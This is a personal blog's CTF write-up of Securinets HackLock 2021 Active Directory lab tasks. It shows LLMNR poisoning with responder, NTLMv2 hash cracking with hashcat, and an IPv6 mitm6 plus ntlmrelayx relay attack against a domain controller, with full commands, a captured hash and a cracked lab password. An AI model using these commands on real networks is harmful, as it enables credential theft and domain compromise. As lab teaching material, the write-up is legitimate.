<!DOCTYPE html><html lang="en"> <head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Securinets HackLock 2021 · ElleuchX1</title><meta name="description" content="Securinets HackLock 2021 Writeup"><link rel="icon" href="/favicon.svg" type="image/svg+xml"><link rel="alternate" type="application/rss+xml" title="ElleuchX1" href="/rss.xml"><meta property="og:title" content="Securinets HackLock 2021 · ElleuchX1"><meta property="og:description" content="Securinets HackLock 2021 Writeup"><meta property="og:type" content="article"><meta property="og:url" content="https://elleu.ch/posts/hacklock2021/"><meta property="og:image" content="https://elleu.ch/og/hacklock2021.png"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:image" content="https://elleu.ch/og/hacklock2021.png"><script>
      (function () {
        try {
          var t = localStorage.getItem('theme');
          if (!t) t = window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
          document.documentElement.setAttribute('data-theme', t);
        } catch (e) {}
      })();
      document.addEventListener('keydown', function (e) {
        if (e.key !== '/' || e.metaKey || e.ctrlKey || e.altKey) return;
        var t = e.target;
        if (t && (t.tagName === 'INPUT' || t.tagName === 'TEXTAREA' || t.isContentEditable)) return;
        e.preventDefault();
        window.location.href = '/search/';
      });
    </script><link rel="stylesheet" href="/_astro/_id_.mL4ELXTH.css"></head> <body> <a class="skip" href="#main">skip to content</a> <header class="site-header" data-pagefind-ignore> <div class="inner"> <a class="brand" href="/">elleuch<span class="at">:~$</span></a> <nav class="nav" aria-label="Main"> <a href="/posts/" aria-current="page">Posts</a><a href="/tags/">Tags</a><a href="/about/">About</a> <a class="search" href="/search/"><kbd>/</kbd></a> <button class="toggle" id="theme-toggle" type="button" aria-label="Toggle theme"> <svg class="i-moon" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <path d="M21 12.8A9 9 0 1 1 11.2 3a7 7 0 0 0 9.8 9.8z"></path> </svg> <svg class="i-sun" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <circle cx="12" cy="12" r="4"></circle> <path d="M12 2v2M12 20v2M4.9 4.9l1.4 1.4M17.7 17.7l1.4 1.4M2 12h2M20 12h2M4.9 19.1l1.4-1.4M17.7 6.3l1.4-1.4"></path> </svg> </button> <script>
  document.getElementById('theme-toggle')?.addEventListener('click', () => {
    const next = document.documentElement.getAttribute('data-theme') === 'dark' ? 'light' : 'dark';
    document.documentElement.setAttribute('data-theme', next);
    try { localStorage.setItem('theme', next); } catch (e) {}
  });
</script> </nav> </div> </header> <main id="main">  <div class="progress" id="progress"></div> <div class="wrap"> <article class="article" data-pagefind-body> <a class="back" href="/posts/">← Posts</a> <header class="article-head"> <h1 data-pagefind-meta="title">Securinets HackLock 2021</h1> <div class="article-meta"> <time datetime="2021-04-24T00:00:00.000Z">2021-04-24</time> <span>2 min read</span> </div> <div class="article-tags"> <a href="/tags/ctf/">#CTF</a><a href="/tags/ad/">#AD</a><a href="/tags/securinets/">#Securinets</a> </div> </header> <details class="toc" open data-pagefind-ignore> <summary>contents</summary> <ul> <li class="d2"><a href="#intercepting-the-user-hash">Intercepting the user hash</a></li><li class="d2"><a href="#cracking-the-hash">Cracking the HASH</a></li><li class="d2"><a href="#flag">FLAG</a></li><li class="d2"><a href="#preparing-for-the-attack">Preparing for the Attack</a></li><li class="d2"><a href="#attacking">Attacking</a></li> </ul> </details> <div class="prose">  <h1 id="overview-of-the-network">Overview of the network</h1>
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/archi.webp">
<h1 id="task-llmnr-poisoning">TASK: LLMNR poisoning</h1>
<h2 id="intercepting-the-user-hash">Intercepting the user hash</h2>
<p>We start by getting the network interface name</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo ifconfig</span></span></code></pre>
<p><img src="/assets/img/hacklock2021/Pasted%20image%2020210220182306.webp" alt="Pasted image 20210220182306"></p>
<p>We’re going to use the responder package which comes preinstalled in kali linux.
So basically we’re going to provide our network interface to responder , and let him do its magic</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo responder -I eth0 -rdwv </span></span></code></pre>
<p>And we wait until a user accidentally make a mistake while writing his hostname instead of providing a legitimate hostname in the DNS.
And get his NTLMv2 hash.</p>
<p><img src="/assets/img/hacklock2021/Pasted%20image%2020210220183501.webp" alt="Pasted image 20210220183501"></p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Username:naruto</span></span>
<span class="line"><span>Hash: naruto:::0099db0783fde495:F2C5BF32BD89C576A1E95A54D4BF7664:0101000000000000C0653150DE09D20121A6F48A2D912BFA000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000B1EAB93D8ABDC394076EB8F8CA0CCF66489376BD473809472A94F666423EA3C20A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0030002E0030002E0036000000000000000000</span></span></code></pre>
<h2 id="cracking-the-hash">Cracking the HASH</h2>
<p>We’re going to use hashcat and rockyou wordlist to crack this hash,Basically we just need the Hash-Mod
First of all, we’re going to look for NTLMv2 Hash-Mod</p>
<p><code>https://hashcat.net/wiki/doku.php?id=example_hashes</code></p>
<p><img src="/assets/img/hacklock2021/Pasted%20image%2020210220184300.webp" alt="Pasted image 20210220184300"></p>
<p>Finally run hashcat,</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>hashcat.exe -m 5600 hash.txt rockyou.txt</span></span></code></pre>
<p><img src="/assets/img/hacklock2021/Pasted%20image%2020210220184655.webp" alt="Pasted image 20210220184655"></p>
<p>And we wait until hashcat cracks it</p>
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220184750.webp">
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span></span></span>
<span class="line"><span>NARUTO:::bb5943c5efa0d0b9:b8a5d31bab00af7d8d013d1d7142dbdf:0101000000000000c0653150de09d201542d404b9a268f50000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d20106000400020000000800300030000000000000000000000000300000b1eab93d8abdc394076eb8f8ca0ccf66489376bd473809472a94f666423ea3c20a0010000000000000000000000000000000000009001a0063006900660073002f00310030002e0030002e0030002e0036000000000000000000:kelvinP@ssw0rd </span></span></code></pre>
<h2 id="flag">FLAG</h2>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Securinets{kelvinP@ssw0rd}</span></span></code></pre>
<h1 id="task-ipv6-attack">Task: IPv6 Attack</h1>
<h2 id="preparing-for-the-attack">Preparing for the Attack</h2>
<p>We’re going to start with gathering informations about the network</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo ifconfig</span></span></code></pre>
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220182306.webp">
<p><code>Network address: 10.0.0.0/24</code></p>
<p>Let’s now find the hosts IPs, It may take a while</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>nmap 10.0.0.0/24 -Pn | grep 10.0.0 | awk '{print $6}' | uniq > ips.txt </span></span></code></pre>
<p>Now let’s an nmap scan on the result</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo nmap -sV -n -v -Pn -p- T4 -iL ips.txt -A --open -oA nmap</span></span></code></pre>
<p>Or you can directly</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo nmap -sC -sV -p- T4 10.0.0.0/24 -oA nmap </span></span></code></pre>
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220195053.webp">
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220195212.webp">
<p>After viewing the nmap results we can see that 10.0.0.7 is ip of the domain controller</p>
<p>We can get the domain name either from the nmap results or by enumerating the ldap</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>ldapsearch -h 10.0.0.7 -x -s base namingcontexts</span></span></code></pre>
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220194446.webp">
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>namingcontexts: DC=SECURINETS,DC=local</span></span>
<span class="line"><span>// SECURINETS.local is the domain name</span></span></code></pre>
<h2 id="attacking">Attacking</h2>
<p>So basically we’re going to  acts as an IPv6 router responsding to configuration request from the machine and assign it with an IPv6 address and an IPv6 DNS server. We going to use mitm6 ( <a href="https://github.com/fox-it/mitm6">https://github.com/fox-it/mitm6</a> ) which will act as IPv6 Router during the attack  and ntlmrelayx  ( Comes preinstalled in kali ) to capture the credentials and relay them to target machine.</p>
<p>Let’s start by setting up mitm6</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo mitm6 -d SECURINETS.local</span></span></code></pre>
<p>Let’s now set up our ntlm relay</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo impacket-ntlmrelayx -6 -t ldaps://10.0.0.7 -wh pwned.SECURINETS.local -l l00t</span></span></code></pre>
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220200338.webp">
And wait until we get something juicy
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220200440.webp">
A folder l00t has been created which contains informations about the AD
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220200621.webp">
<p>And we grab our flag</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>cat * | grep Securinets</span></span></code></pre>
<img decoding="async" loading="lazy" class="special-img-class" alt="test" src="/assets/img/hacklock2021/Pasted%20image%2020210220201212.webp">
## Flag
```
Securinets{U_D1d_W3ll_S0lv1ng_Th1s_AD_Master}
```  </div> <nav class="pager" aria-label="Post navigation"> <a href="/posts/htb-Laboratory/"><span class="lbl">← prev</span>HackTheBox - Laboratory Writeup</a> <a class="next" href="/posts/htb-academy/"><span class="lbl">next →</span>HackTheBox - Academy Writeup</a> </nav> </article> </div> <aside class="toc-rail" data-pagefind-ignore aria-label="Table of contents"> <div class="lbl">contents</div> <ul> <li class="d2"><a href="#intercepting-the-user-hash">Intercepting the user hash</a></li><li class="d2"><a href="#cracking-the-hash">Cracking the HASH</a></li><li class="d2"><a href="#flag">FLAG</a></li><li class="d2"><a href="#preparing-for-the-attack">Preparing for the Attack</a></li><li class="d2"><a href="#attacking">Attacking</a></li> </ul> </aside><button class="to-top" id="to-top" type="button" aria-label="Back to top">↑ top</button>  </main> <footer class="site-footer" data-pagefind-ignore> <div class="inner"> <span>© 2026 ElleuchX1</span> <span> <a href="https://github.com/ElleuchX1">github</a> ·
<a href="https://twitter.com/ElleuchX1">x</a> ·
<a href="/rss.xml">rss</a> ·
<a href="mailto:contact@elleu.ch">mail</a> </span> </div> </footer> </body></html> <script>
  (function () {
    // reading progress + back-to-top
    var bar = document.getElementById('progress');
    var top = document.getElementById('to-top');
    function update() {
      var h = document.documentElement;
      var max = h.scrollHeight - h.clientHeight;
      var pct = max > 0 ? h.scrollTop / max : 0;
      if (bar) bar.style.width = pct * 100 + '%';
      if (top) top.classList.toggle('show', h.scrollTop > 600);
    }
    document.addEventListener('scroll', update, { passive: true });
    if (top) top.addEventListener('click', function () { window.scrollTo({ top: 0, behavior: 'smooth' }); });
    update();

    // permalink anchors on headings
    document.querySelectorAll('.prose h2[id], .prose h3[id]').forEach(function (h) {
      var a = document.createElement('a');
      a.className = 'anchor';
      a.href = '#' + h.id;
      a.setAttribute('aria-label', 'Link to this section');
      a.textContent = '#';
      h.appendChild(a);
    });

    // code blocks: language label + copy button
    document.querySelectorAll('.prose pre.astro-code').forEach(function (pre) {
      var wrap = document.createElement('div');
      wrap.className = 'code';
      pre.parentNode.insertBefore(wrap, pre);
      var bar = document.createElement('div');
      bar.className = 'code-bar';
      var lang = pre.getAttribute('data-language') || 'text';
      var span = document.createElement('span');
      span.className = 'code-lang';
      span.textContent = lang;
      var btn = document.createElement('button');
      btn.type = 'button';
      btn.className = 'copy';
      btn.textContent = 'copy';
      btn.addEventListener('click', function () {
        var text = pre.innerText;
        var done = function () { btn.textContent = 'copied'; setTimeout(function () { btn.textContent = 'copy'; }, 1200); };
        if (navigator.clipboard) { navigator.clipboard.writeText(text).then(done, done); }
        else {
          var ta = document.createElement('textarea'); ta.value = text; document.body.appendChild(ta); ta.select();
          try { document.execCommand('copy'); } catch (e) {} ta.remove(); done();
        }
      });
      bar.appendChild(span);
      bar.appendChild(btn);
      wrap.appendChild(bar);
      wrap.appendChild(pre);
    });
  })();
</script>